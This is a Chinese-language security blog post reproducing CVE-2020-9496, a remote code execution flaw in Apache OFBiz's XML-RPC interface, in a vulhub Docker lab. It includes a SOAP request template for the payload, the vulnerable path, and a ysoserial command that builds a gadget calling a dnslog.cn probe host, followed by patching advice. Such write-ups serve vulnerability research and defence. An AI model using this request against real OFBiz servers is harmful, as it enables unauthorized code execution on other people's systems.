*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。
1、 简介
OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。
2、 漏洞描述
CVE-2020-9496漏洞是Apache Ofbiz中xmlrpc接口的一个rce漏洞,攻击者可以利用未授权访问该接口,并且构造数据请求包,进行远程代码执行漏洞,获得系统权限。
3、 影响范围
Ofbiz:< 17.12.04
4、 漏洞环境
该漏洞在vulhub拥有docker镜像,只需要进入vulhub目录,开启容器即可
https://vulhub.org/#/environments/ofbiz/CVE-2020-9496/
docker-compose up -d 开启容器。
开启后访问http://ip:8443/myportal/control/main
5、 复现
数据包:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/"> <soapenv:Header/> <soapenv:Body> <ser> <map-Map> <map-Entry> <map-Key> <cus-obj> ‘此处填写payload’ </cus-obj> </map-Key> <map-Value> <std-String/> </map-Value> </map-Entry> </map-Map> </ser> </soapenv:Body> </soapenv:Envelope>
该漏洞需要用到工具ysoserial.jar。
git clone https://github.com/frohoff/ysoserial.git
漏洞url:
/webtools/control/xmlrpc java -jar ysoserial.jar URLDNS http://r0bz3h.dnslog.cn | base64 | tr -d "\n"
生成base编码后的payload
将payload复制进请求包中发送。
6、 漏洞防御
可更新至Apache OFBiz最新版。
下载地址:https://ofbiz.apache.org/download.html#vulnerabilities
临时修复建议:
若业务环境允许,使用白名单限制web端口的访问来降低风险。
来源:freebuf.com 2021-05-12 12:52:32 by: linluhaijing
请登录后发表评论
注册